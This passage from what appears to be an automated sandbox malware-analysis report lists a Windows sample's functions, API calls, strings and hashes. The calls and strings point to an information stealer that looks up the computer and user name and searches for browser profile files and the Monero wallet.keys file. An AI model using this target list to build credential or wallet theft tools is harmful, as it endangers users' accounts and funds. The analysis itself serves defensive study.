                                          • Opcode Fuzzy Hash: e9c0ccd840ecf18bd96aea16af45c97322eacb679d50bc20c128e13cafa8991b
                                          • Instruction Fuzzy Hash: 49F0E271641208BBEB149AA4AC4AFAFB7E8E709B15F301448F944E7280D572AE40CBA4
                                          Function 00E91190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7910
                                            • Part of subcall function 00EA78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EA7917
                                            • Part of subcall function 00EA78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EA792F
                                            • Part of subcall function 00EA7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E911B7), ref: 00EA7880
                                            • Part of subcall function 00EA7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EA7887
                                            • Part of subcall function 00EA7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EA789F
                                          • ExitProcess.KERNEL32 ref: 00E911C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                                          • String ID:
                                          • API String ID: 3550813701-0
                                          • Opcode ID: f0fbea52c114bec67b5a96e37e29fea3fb5af8c0100f71a0a1f5626e64e99a55
                                          • Instruction ID: 052b820198f520e34a289f9b64f68918f0ce4555714836b5950258ce6cf36c27
                                          • Opcode Fuzzy Hash: f0fbea52c114bec67b5a96e37e29fea3fb5af8c0100f71a0a1f5626e64e99a55
                                          • Instruction Fuzzy Hash: 65E012B5F15312A7CE1473B1AD0AB2A32DC9B1D349F042424FE45F7106FA2EF8008665

                                          Non-executed Functions

                                          Function 00EA38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wsprintfA.USER32 ref: 00EA38CC
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00EA38E3
                                          • lstrcat.KERNEL32(?,?), ref: 00EA3935
                                          • StrCmpCA.SHLWAPI(?,00EB0F70), ref: 00EA3947
                                          • StrCmpCA.SHLWAPI(?,00EB0F74), ref: 00EA395D
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA3C67
                                          • FindClose.KERNEL32(000000FF), ref: 00EA3C7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                          • API String ID: 1125553467-2524465048
                                          • Opcode ID: 302f01fea8ad5f19588333a890493f915e2ff18a4e4ba6830a9674f2f29c4c72
                                          • Instruction ID: 1114c198d08628d483d5e35ab9f4bb06f251991f7badc83f97139f25804ce5fa
                                          • Opcode Fuzzy Hash: 302f01fea8ad5f19588333a890493f915e2ff18a4e4ba6830a9674f2f29c4c72
                                          • Instruction Fuzzy Hash: 6DA12171A00218DBDB34DBA4DC85FFA73B9BB89300F044589B94DAB145EB75AB84CF61
                                          Function 00E9BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00EB0B32,00EB0B2B,00000000,?,?,?,00EB13F4,00EB0B2A), ref: 00E9BEF5
                                          • StrCmpCA.SHLWAPI(?,00EB13F8), ref: 00E9BF4D
                                          • StrCmpCA.SHLWAPI(?,00EB13FC), ref: 00E9BF63
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9C7BF
                                          • FindClose.KERNEL32(000000FF), ref: 00E9C7D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                          • API String ID: 3334442632-726946144
                                          • Opcode ID: 58a2a205951c3e3cb7ab7bbaed80741f5a26616e02911c9f7f794f5cb58bcd5f
                                          • Instruction ID: 057edf5fbd4676ba2bf255f1f61bf187f02a1d25c0e5408e804a7135708133a0
                                          • Opcode Fuzzy Hash: 58a2a205951c3e3cb7ab7bbaed80741f5a26616e02911c9f7f794f5cb58bcd5f
                                          • Instruction Fuzzy Hash: 384256729102049BCF54FB70DD56EEE73BDAF89300F445569B906BA081EF34AB49CB92
                                          Function 00EA4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wsprintfA.USER32 ref: 00EA492C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00EA4943
                                          • StrCmpCA.SHLWAPI(?,00EB0FDC), ref: 00EA4971
                                          • StrCmpCA.SHLWAPI(?,00EB0FE0), ref: 00EA4987
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA4B7D
                                          • FindClose.KERNEL32(000000FF), ref: 00EA4B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\%s$%s\%s$%s\*
                                          • API String ID: 180737720-445461498
                                          • Opcode ID: a3463d930dc137c24b273d5223ebad168a6d62a2bd0825dfed9d5439bdb80e2a
                                          • Instruction ID: 3c1670365783fd4da19140a746c899a0defe0c2edc4de206bdfb89c1232c7577
                                          • Opcode Fuzzy Hash: a3463d930dc137c24b273d5223ebad168a6d62a2bd0825dfed9d5439bdb80e2a
                                          • Instruction Fuzzy Hash: 6A6155B1A00219EBCB34EBA0DC45EFB73BCBB89700F004598B949A6145EB75AB45CF91
                                          Function 00EA4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EA4580
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA4587
                                          • wsprintfA.USER32 ref: 00EA45A6
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00EA45BD
                                          • StrCmpCA.SHLWAPI(?,00EB0FC4), ref: 00EA45EB
                                          • StrCmpCA.SHLWAPI(?,00EB0FC8), ref: 00EA4601
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA468B
                                          • FindClose.KERNEL32(000000FF), ref: 00EA46A0
                                          • lstrcat.KERNEL32(?,00BBFBA0), ref: 00EA46C5
                                          • lstrcat.KERNEL32(?,00BBE4A8), ref: 00EA46D8
                                          • lstrlen.KERNEL32(?), ref: 00EA46E5
                                          • lstrlen.KERNEL32(?), ref: 00EA46F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                          • String ID: %s\%s$%s\*
                                          • API String ID: 671575355-2848263008
                                          • Opcode ID: 75ff78f72675eafe750b2b882b7f39d6abc44e638fed09a19675c4e7a89f1075
                                          • Instruction ID: 78948d73fb55697b8579444f92feea659a58b5024f0cb11245c65dc92d32cc0d
                                          • Opcode Fuzzy Hash: 75ff78f72675eafe750b2b882b7f39d6abc44e638fed09a19675c4e7a89f1075
                                          • Instruction Fuzzy Hash: 565149B1A00218DBC774EB70DC89FEE737CAB59300F405588B949A7184DB75AB84CF91
                                          Function 00EA3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wsprintfA.USER32 ref: 00EA3EC3
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00EA3EDA
                                          • StrCmpCA.SHLWAPI(?,00EB0FAC), ref: 00EA3F08
                                          • StrCmpCA.SHLWAPI(?,00EB0FB0), ref: 00EA3F1E
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA406C
                                          • FindClose.KERNEL32(000000FF), ref: 00EA4081
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\%s
                                          • API String ID: 180737720-4073750446
                                          • Opcode ID: 9a5215a619a4db3b2d9fe3bdd10b667292a5084f8cd246c39112ed406f30ba09
                                          • Instruction ID: af33566fcfd793bc06e573625e0fe19f21ff951dd4921192f0d796190cf66995
                                          • Opcode Fuzzy Hash: 9a5215a619a4db3b2d9fe3bdd10b667292a5084f8cd246c39112ed406f30ba09
                                          • Instruction Fuzzy Hash: AF5159B6A00218EBCB34EBB0DC85EFA73BCBB48300F445598B659A7044DB75AB85CF51
                                          Function 00E9ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wsprintfA.USER32 ref: 00E9ED3E
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00E9ED55
                                          • StrCmpCA.SHLWAPI(?,00EB1538), ref: 00E9EDAB
                                          • StrCmpCA.SHLWAPI(?,00EB153C), ref: 00E9EDC1
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9F2AE
                                          • FindClose.KERNEL32(000000FF), ref: 00E9F2C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\*.*
                                          • API String ID: 180737720-1013718255
                                          • Opcode ID: 6515f4bb145ee73810c2a5b1f8d102ed4f5ff65e1d4393ab1c7c6711caf42601
                                          • Instruction ID: adbc050767f68a800f2ca1960bbece0ee6f857e1269551609c5eb42b16398f42
                                          • Opcode Fuzzy Hash: 6515f4bb145ee73810c2a5b1f8d102ed4f5ff65e1d4393ab1c7c6711caf42601
                                          • Instruction Fuzzy Hash: EBE162729112189ADB98EB20CC56EEE73B8AF59300F4551E9B40B76052EF347F8ACF51
                                          Function 00E9F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EB15B8,00EB0D96), ref: 00E9F71E
                                          • StrCmpCA.SHLWAPI(?,00EB15BC), ref: 00E9F76F
                                          • StrCmpCA.SHLWAPI(?,00EB15C0), ref: 00E9F785
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9FAB1
                                          • FindClose.KERNEL32(000000FF), ref: 00E9FAC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID: prefs.js
                                          • API String ID: 3334442632-3783873740
                                          • Opcode ID: 551ef16f1198918fc635b8a75e35e698e951cb190a60607483a79a38eb90c5ef
                                          • Instruction ID: 28bc6cd71079cf5847a4f84b98af069d992ba416a5de2ba5bd958c4c2898fc07
                                          • Opcode Fuzzy Hash: 551ef16f1198918fc635b8a75e35e698e951cb190a60607483a79a38eb90c5ef
                                          • Instruction Fuzzy Hash: C3B145719002049BCB68EF60DC55AEE73B9AF59300F4495B9F40AAB141EF357B49CF91
                                          Function 00E916D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EB510C,?,?,?,00EB51B4,?,?,00000000,?,00000000), ref: 00E91923
                                          • StrCmpCA.SHLWAPI(?,00EB525C), ref: 00E91973
                                          • StrCmpCA.SHLWAPI(?,00EB5304), ref: 00E91989
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E91D40
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E91DCA
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E91E20
                                          • FindClose.KERNEL32(000000FF), ref: 00E91E32
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
